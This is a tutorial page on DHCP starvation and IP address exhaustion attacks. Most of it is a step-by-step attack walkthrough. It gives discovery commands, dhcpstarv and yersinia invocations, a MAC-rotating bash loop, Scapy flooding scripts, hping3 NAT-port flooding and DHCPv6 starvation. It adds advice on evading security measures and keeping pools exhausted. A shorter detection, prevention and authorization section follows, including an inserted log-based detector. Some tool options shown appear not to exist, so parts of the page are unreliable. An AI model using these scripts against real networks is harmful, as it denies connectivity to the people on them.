IP Address Exhaustion
Understanding IP Address Exhaustion - Network Resource Depletion
What is IP Address Exhaustion?
Simple Definition: IP address exhaustion attacks overwhelm network services that manage IP address allocation, preventing legitimate users from obtaining IP addresses and causing widespread network connectivity problems.
Technical Definition: IP address exhaustion attacks target Dynamic Host Configuration Protocol (DHCP) servers, Network Address Translation (NAT) systems, and IP allocation mechanisms to deplete available address pools through resource consumption, causing denial of service and network segmentation bypass opportunities.
Why IP Address Exhaustion Works
IP address exhaustion attacks succeed due to finite resource limitations and protocol design assumptions:
- Limited Address Pools: IPv4 networks have finite IP address ranges available for allocation
- Stateful Allocation: DHCP servers maintain state for allocated addresses with lease timers
- No Authentication: Most IP allocation systems don’t authenticate or rate-limit requests
- Automatic Allocation: Systems automatically grant addresses to requesting clients without verification
Attack Process Breakdown
Normal IP Address Allocation
- Pool Configuration: Administrator defines available IP address ranges
- Client Request: Device requests IP address through DHCP or other allocation method
- Address Assignment: Server allocates available address from pool
- Lease Management: Server tracks allocation with timeout mechanisms
- Address Recovery: Expired leases return addresses to available pool
Address Exhaustion Attack
- Pool Discovery: Identify target allocation systems and available address ranges
- Request Flooding: Generate massive numbers of allocation requests with unique identifiers
- Pool Depletion: Consume all available addresses in target pools
- Service Denial: Legitimate clients cannot obtain IP addresses
- Secondary Exploitation: Use connectivity disruption for further attacks
Real-World Impact
Network Service Denial: Prevent new devices from connecting to network infrastructure
Corporate Network Disruption: Employees unable to obtain IP addresses for work devices
Public WiFi Attacks: Exhaust guest network addresses to force users onto malicious networks
IoT Device Targeting: Prevent IoT devices from obtaining addresses during automated provisioning
VPN and Remote Access Impact: Block remote workers from establishing VPN connections
Technical Concepts
DHCP Address Allocation
DHCP Process (DORA):
- Discover: Client broadcasts request for IP address
- Offer: Server responds with available address offer
- Request: Client formally requests offered address
- Acknowledge: Server confirms allocation and lease terms
Lease Management: Addresses allocated for specific time periods with renewal mechanisms
Network Address Translation (NAT)
- NAT Pool Exhaustion: Overwhelm available public IP addresses in NAT pools
- Port Exhaustion: Consume available port numbers for network address translation
- Session Table Flooding: Fill NAT session tables with fake connections
IPv6 Address Allocation
- SLAAC Exhaustion: Deplete Stateless Address Autoconfiguration resources
- DHCPv6 Attacks: Target IPv6 DHCP servers with allocation flooding
- Prefix Delegation Abuse: Exhaust available IPv6 prefix delegations
Technical Implementation
Prerequisites
Network Requirements:
- Access to network segment with DHCP or allocation services
- Ability to generate multiple MAC addresses or client identifiers
- Understanding of target network IP allocation policies
Essential Tools:
- DHCPStarv: DHCP starvation and exhaustion tool
- Yersinia: Layer 2/3 attack framework with DHCP capabilities
- Nmap: Network discovery and service identification
- Scapy: Custom DHCP packet crafting
Essential Command Sequence
Step 1: IP Allocation Service Discovery
# Discover DHCP servers on network
nmap --script dhcp-discover 192.168.1.0/24
# Identifies active DHCP servers
# Shows available IP ranges and lease information
# Reveals server configuration and policies
# Monitor DHCP traffic patterns
tcpdump -i eth0 -v 'port 67 or port 68'
# Port 67: DHCP server port
# Port 68: DHCP client port
# Observe normal allocation request rates
# Test current DHCP functionality
dhclient -r eth0 # Release current lease
dhclient -v eth0 # Request new lease with verbose output
# Verify DHCP service responsiveness
# Understand lease duration and policies
Purpose: Identify DHCP infrastructure and understand normal allocation patterns before launching exhaustion attacks.
Step 2: Estimate Address Pool Size
# Probe for DHCP pool boundaries
nmap --script dhcp-discover --script-args dhcp-discover.requests=50
# Multiple requests to identify pool size
# Reveals allocation patterns and available ranges
# Systematic address space probing
for i in {100..200}; do
arping -c 1 192.168.1.$i >/dev/null 2>&1
if [ $? -eq 0 ]; then
echo "192.168.1.$i is active"
fi
done
# Maps active addresses to estimate free pool
# Helps calculate required attack volume
Purpose: Determine the size of target address pools to plan effective exhaustion attacks.
Step 3: Basic DHCP Starvation Attack
Using DHCPStarv:
# Basic DHCP starvation attack
dhcpstarv -i eth0
# -i eth0: Network interface for attack
# Generates DHCP requests with random MAC addresses
# Continues until pool exhausted or stopped
# Monitor attack progress
tcpdump -i eth0 -c 100 'port 67 or port 68' | grep -c DHCP
# Count DHCP messages during attack
# Watch for NACK responses indicating pool exhaustion
# Track server response behavior changes
Using Yersinia:
# Interactive DHCP exhaustion
yersinia -I
# Select: DHCP protocol
# Choose: "sending discover packet" attack
# Configure MAC address generation options
# Command-line DHCP starvation
yersinia dhcp -attack 1 -interface eth0
# Attack 1: DHCP starvation
# Automatically generates unique MAC addresses
# Floods server with allocation requests
Step 4: Advanced Pool Exhaustion Techniques
Custom Starvation Script with Rate Control:
#!/bin/bash
# Systematic DHCP pool exhaustion
INTERFACE="eth0"
TOTAL_REQUESTS=1000
for i in $(seq 1 $TOTAL_REQUESTS); do
# Generate unique MAC address
MAC="02:$(printf '%02x' $((i % 256))):$(openssl rand -hex 4 | sed 's/\(..\)/\1:/g;s/:$//')"
# Set interface MAC address
ifconfig $INTERFACE down
ifconfig $INTERFACE hw ether $MAC
ifconfig $INTERFACE up
# Request IP address with unique MAC
timeout 10 dhclient -1 $INTERFACE 2>/dev/null
echo "Request $i: MAC $MAC"
# Rate limiting to avoid overwhelming interface
sleep 1
done
Targeted Pool Exhaustion with Scapy:
#!/usr/bin/env python3
from scapy.all import *
import random
def generate_dhcp_discover(mac_addr):
"""Generate DHCP discover packet with specified MAC"""
return Ether(dst="ff:ff:ff:ff:ff:ff", src=mac_addr)/\
IP(src="0.0.0.0", dst="255.255.255.255")/\
UDP(sport=68, dport=67)/\
BOOTP(chaddr=[mac_addr])/\
DHCP(options=[("message-type", "discover"), "end"])
# Exhaust DHCP pool with custom packets
for i in range(1000):
# Generate random MAC address
mac = "02:%02x:%02x:%02x:%02x:%02x" % (
random.randint(0, 255), random.randint(0, 255),
random.randint(0, 255), random.randint(0, 255),
random.randint(0, 255)
)
# Send DHCP discover
sendp(generate_dhcp_discover(mac), iface="eth0")
if i % 100 == 0:
print(f"Sent {i} DHCP discover packets")
Step 5: Verify Exhaustion Success
# Test legitimate client allocation failure
dhclient -r eth0 # Release any existing lease
dhclient -v eth0 2>&1 | grep -i "no offers"
# Should fail to obtain address if pool exhausted
# "No DHCP offers received" indicates successful attack
# Monitor DHCP server responses
tcpdump -i eth0 -v 'port 67' | grep -E "(NACK|NAK)"
# DHCP NACK responses indicate pool exhaustion
# Server rejecting requests due to no available addresses
# Verify pool status (if server access available)
# From DHCP server:
dhcp-lease-list | wc -l
# Count active leases
# Should approach or exceed pool size
Purpose: Confirm that DHCP pool exhaustion has been achieved and legitimate clients cannot obtain addresses.
Attack Variations
Selective Device Targeting
# Target specific device types by MAC OUI
# VMware devices
yersinia dhcp -attack 1 -mac-prefix "00:50:56"
# Apple devices
yersinia dhcp -attack 1 -mac-prefix "a4:c3:61"
# Dell devices
yersinia dhcp -attack 1 -mac-prefix "00:14:22"
# Useful in environments with mixed device types
# Can target corporate vs personal devices selectively
NAT Pool Exhaustion
# Exhaust NAT pool through connection flooding
for port in {1024..65535}; do
hping3 -c 1 -S -p 80 -s $port 8.8.8.8 &
done
# Creates many outbound connections
# Exhausts available NAT translations
# Prevents legitimate outbound connectivity
IPv6 Address Exhaustion
# DHCPv6 starvation attack
# Generate random DUID (DHCP Unique Identifier)
for i in {1..1000}; do
DUID="00:01:00:01:$(printf '%08x' $RANDOM):$(openssl rand -hex 6)"
dhclient -6 -D $DUID eth0 2>/dev/null &
done
# SLAAC prefix exhaustion
# Generate unique IPv6 addresses using EUI-64
# Overwhelm neighbor discovery cache
Common Issues and Solutions
Problem: DHCP server not responding to attack
- Solution: Verify network connectivity, check for DHCP relay configuration, ensure proper interface setup
Problem: Limited impact from exhaustion attack
- Solution: Increase request rate, verify target pool size, check for multiple DHCP servers
Problem: Attack blocked by security measures
- Solution: Use legitimate vendor OUIs for MAC addresses, vary request timing, reduce attack intensity
Problem: Pool recovers too quickly
- Solution: Maintain continuous low-level attack, prevent lease renewals, target multiple pools simultaneously
Advanced Techniques
Lease Renewal Prevention
# Prevent lease renewals to maintain exhaustion
#!/bin/bash
# Monitor for DHCP renewal attempts and interfere
tcpdump -i eth0 -l 'port 67 or port 68' | while read line; do
if echo "$line" | grep -q "DHCP Request"; then
# Extract client MAC and send fake NACK
# Requires packet crafting to forge server response
echo "Blocking renewal attempt"
fi
done
Multi-Server Coordination
# Coordinate attacks against multiple DHCP servers
SERVERS=("192.168.1.1" "192.168.1.2" "192.168.1.3")
for server in "${SERVERS[@]}"; do
dhcpstarv -i eth0 -s $server &
done
# Exhausts multiple server pools simultaneously
# More effective in redundant DHCP environments
DHCP Option Abuse
#!/usr/bin/env python3
from scapy.all import *
# DHCP discover with unusual options
dhcp_packet = Ether(dst="ff:ff:ff:ff:ff:ff")/\
IP(src="0.0.0.0", dst="255.255.255.255")/\
UDP(sport=68, dport=67)/\
BOOTP()/\
DHCP(options=[
("message-type", "discover"),
("requested_addr", "192.168.1.999"), # Invalid address
("param_req_list", [1,3,6,15] * 50), # Excessive options
"end"
])
sendp(dhcp_packet, iface="eth0")
# May trigger parsing errors or resource consumption
Detection and Prevention
Detection Indicators
- Rapid increase in DHCP requests from single interface
- DHCP requests with sequential or suspicious MAC addresses
- High volume of DHCP discover packets without corresponding requests
- Pool utilization approaching 100% unexpectedly
- DHCP server CPU or memory utilization spikes
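One way to turn the first three indicators into a check over DHCP server logs, as an added example that is not part of the original page. The log line format (an epoch timestamp followed by a simplified ISC dhcpd-style message), the thresholds, and the names `detect_starvation` and `is_locally_administered` are assumptions; the sample lines are constructed.

```python
import re
from collections import defaultdict

# Simplified ISC dhcpd-style message with an epoch prefix (assumed log format).
LINE = re.compile(
    r"^(?P<ts>\d+) (?P<type>DHCPDISCOVER|DHCPREQUEST) (?:for \S+ )?"
    r"from (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}) via (?P<via>\S+)$")

def is_locally_administered(mac):
    """Bit 1 of the first octet set means the MAC was not vendor-assigned."""
    return bool(int(mac[:2], 16) & 0x02)

def detect_starvation(lines, window=10, max_new_macs=20, min_completion=0.5):
    """Alert on an ingress point (interface or relay) that shows a burst of
    never-seen-before MACs within `window` seconds whose DISCOVERs are rarely
    followed by a REQUEST from the same MAC."""
    per_via = defaultdict(lambda: {"discover": {}, "request": set()})
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # ignore OFFER/ACK and unrelated lines
        state = per_via[m["via"]]
        if m["type"] == "DHCPDISCOVER":
            state["discover"].setdefault(m["mac"], int(m["ts"]))  # first seen
        else:
            state["request"].add(m["mac"])
    alerts = []
    for via, state in per_via.items():
        first_seen = sorted(state["discover"].values())
        burst, lo = 0, 0  # sliding window over first-seen timestamps
        for hi, ts in enumerate(first_seen):
            while ts - first_seen[lo] > window:
                lo += 1
            burst = max(burst, hi - lo + 1)
        macs = state["discover"].keys()
        completed = len(macs & state["request"]) / len(macs) if macs else 1.0
        if burst > max_new_macs and completed < min_completion:
            alerts.append({"via": via, "burst": burst,
                           "completion": round(completed, 2),
                           "local_macs": sum(map(is_locally_administered, macs))})
    return alerts

# Constructed sample: three clients completing DORA on eth1, a 40-MAC burst on eth0.
SAMPLE = [f"{1000 + i * 30} DHCPDISCOVER from 3c:52:82:00:00:{i:02x} via eth1" for i in range(3)]
SAMPLE += [f"{1001 + i * 30} DHCPREQUEST for 192.0.2.{10 + i} from 3c:52:82:00:00:{i:02x} via eth1" for i in range(3)]
SAMPLE += [f"{2000 + i // 8} DHCPDISCOVER from 02:00:00:00:01:{i:02x} via eth0" for i in range(40)]
```

The `local_macs` count is context for triage, not a trigger on its own, since operating systems that randomize MAC addresses also set the locally administered bit.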
Prevention Measures
DHCP Server Configuration:
# Configure rate limiting per client
lease-limit 3; # Maximum 3 leases per client
ping-check true; # Verify address availability
conflict-detection true; # Enable address conflict detection
# Implement MAC address filtering
deny unknown-clients; # Only serve known MAC addresses
Network Design:
- Implement DHCP snooping on switches
- Configure appropriate pool sizes for expected clients
- Deploy multiple DHCP servers with split pools
- Use DHCP relay agents to centralize management
Monitoring and Alerting:
- Monitor DHCP pool utilization trends
- Alert on rapid lease consumption
- Track MAC address request patterns
- Implement network access control (NAC)
Professional Context
Legitimate Use Cases
- Security Testing: Validating DHCP security configurations and resilience
- Capacity Planning: Testing DHCP server capacity and failover mechanisms
- Network Troubleshooting: Understanding DHCP allocation behavior under stress
- Disaster Recovery: Testing DHCP service continuity and recovery procedures
Legal and Ethical Requirements
Authorization: IP exhaustion attacks can cause widespread network outages, so explicit written permission is essential
Scope Definition: Clearly identify which network segments and DHCP services are in-scope
Impact Assessment: Document potential for complete network connectivity loss
Recovery Planning: Ensure ability to restore DHCP services and clear exhausted pools quickly
IP address exhaustion attacks demonstrate the critical importance of proper DHCP security configuration and capacity planning, highlighting how fundamental network services can become attack vectors when improperly secured.